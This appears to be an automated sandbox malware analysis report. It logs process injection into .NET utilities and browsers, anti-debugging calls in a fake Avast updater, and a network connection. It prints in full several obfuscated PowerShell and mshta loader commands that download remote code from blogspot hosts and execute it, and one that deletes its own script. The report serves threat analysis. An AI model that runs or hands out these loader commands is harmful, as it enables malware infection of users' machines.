                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00E17BBC mov eax, dword ptr fs:[00000030h]52_2_00E17BBC
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F091E9F mov eax, dword ptr fs:[00000030h]52_2_7F091E9F
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F092203 mov eax, dword ptr fs:[00000030h]52_2_7F092203
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00FE643F GetProcessHeap,52_2_00FE643F
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF652A75BD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_00007FF652A75BD8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF652A63028 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,34_2_00007FF652A63028
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00FE7878 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,52_2_00FE7878
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00FE799A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,52_2_00FE799A
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00FEA14C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,52_2_00FEA14C
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00FE7B31 SetUnhandledExceptionFilter,52_2_00FE7B31
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA04720 FreeLibrary,FreeLibrary,FreeLibrary,EnterCriticalSection,SetUnhandledExceptionFilter,LeaveCriticalSection,DeleteCriticalSection,ReleaseSemaphore,WaitForSingleObject,CloseHandle,CloseHandle,DeleteCriticalSection,CloseHandle,CloseHandle,DeleteCriticalSection,52_2_6BA04720
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA0447A CloseHandle,InitializeCriticalSection,CreateSemaphoreW,CreateSemaphoreW,CreateSemaphoreW,CreateThread,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,InitializeCriticalSection,EnterCriticalSection,SetUnhandledExceptionFilter,LeaveCriticalSection,52_2_6BA0447A
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA049B0 SetUnhandledExceptionFilter,LeaveCriticalSection,52_2_6BA049B0
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA04943 EnterCriticalSection,SetUnhandledExceptionFilter,52_2_6BA04943
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA1FB98 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,52_2_6BA1FB98
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA199CC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,52_2_6BA199CC
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA19602 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,52_2_6BA19602
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\System32\svchost.exe	Process created / APC Queued / Resumed: C:\Program Files\Google\Chrome\Application\chrome.exe
                      Source: C:\Windows\System32\svchost.exe	Process created / APC Queued / Resumed: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 185.208.159.170 2484
                      Source: 7.2.RegSvcs.exe.3616834.2.raw.unpack, Flutter.cs	Reference to suspicious API methods: VirtualAlloc(IntPtr.Zero, new IntPtr(65536), MEM_COMMIT, 4u)
                      Source: 7.2.RegSvcs.exe.3616834.2.raw.unpack, Flutter.cs	Reference to suspicious API methods: Marshal.WriteIntPtr(new IntPtr(intPtr.ToInt64() + num), GetProcAddress(moduleHandle, array[i]))
                      Source: 7.2.RegSvcs.exe.3616834.2.raw.unpack, Flutter.cs	Reference to suspicious API methods: VirtualProtect(intPtr, 65536u, 64u, out var _)
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 2049C190000 protect: page read and write
                      Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\System32\svchost.exe	Section loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: execute and read and write
                      Source: C:\Windows\System32\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe protection: execute and read and write
                      Source: C:\Windows\System32\svchost.exe	Thread APC queued: target process: C:\Program Files\Google\Chrome\Application\chrome.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 540000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 548000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: EEC008
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 540000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 548000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: CEA008
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 540000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 548000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: EAE008
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 540000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 548000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 376008
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 288008
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 400000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 402000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 540000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 548000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 93A008
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe	Memory written: C:\Windows\System32\dllhost.exe base: 2049C190000
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe	Memory written: C:\Windows\System32\dllhost.exe base: 7FF7E61714E0
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe	Code function: 52_2_6B8F8139 SetForegroundWindow,ShellExecuteExW,AllowSetForegroundWindow,GetLastError,GetLastError,DestroyWindow,SetLastError
                      Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\SettingSyncHost.exe "C:\Windows\System32\SettingSyncHost.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 772
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 892
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 792
                      Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                      Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmlaunch.exe "C:\Program Files\Windows Media Player\wmlaunch.exe"
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;& ('{1}{0}' -f 'ex', 'i') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);start-sleep -seconds 6;
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe "javascript:var lhn = ['shell.application', 'shellexecute', 'powershell', '-ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;start-sleep -seconds 7;', '', 'open', 0], iax = ['scripting.filesystemobject', 'deletefile', 'wscript.scriptfullname'], ijs = new activexobject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new activexobject(iax[0])[iax[1]](wscript[iax[2]]);"
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe "c:\windows\system32\mshta.exe" "javascript:var fll = ['shell.application', 'shellexecute', 'powershell', '-ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;start-sleep -seconds 7
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe "javascript:var lhn = ['shell.application', 'shellexecute', 'powershell', '-ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;start-sleep -seconds 7;', '', 'open', 0], iax = ['scripting.filesystemobject', 'deletefile', 'wscript.scriptfullname'], ijs = new activexobject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new activexobject(iax[0])[iax[1]](wscript[iax[2]]);"
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe "c:\windows\system32\mshta.exe" "javascript:var fll = ['shell.application', 'shellexecute', 'powershell', '-ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;start-sleep -seconds 7
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe "javascript:var lhn = ['shell.application', 'shellexecute', 'powershell', '-ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;start-sleep -seconds 7;', '', 'open', 0], iax = ['scripting.filesystemobject', 'deletefile', 'wscript.scriptfullname'], ijs = new activexobject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new activexobject(iax[0])[iax[1]](wscript[iax[2]]);"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;& ('{1}{0}' -f 'ex', 'i') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);start-sleep -seconds 6;Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B8F66A9 GetSecurityDescriptorDacl,SetSecurityDescriptorDacl,52_2_6B8F66A9
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B900E06 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,52_2_6B900E06
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00FE7B9B cpuid 52_2_00FE7B9B
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,52_2_6BA38030
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,52_2_6BA37AE3
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: EnumSystemLocalesW,52_2_6BA37A56
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: EnumSystemLocalesW,52_2_6BA379BB
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: EnumSystemLocalesW,52_2_6BA37970
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: GetLocaleInfoW,52_2_6BA378C7
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: GetLocaleInfoW,52_2_6BA37F63
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,52_2_6BA37E5C
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: GetLocaleInfoW,52_2_6BA37D33
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: EnumSystemLocalesW,52_2_6BA2F1F6
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: GetLocaleInfoW,52_2_6BA2F76D
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: IsValidCodePage,GetLocaleInfoW,52_2_6BA376F8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
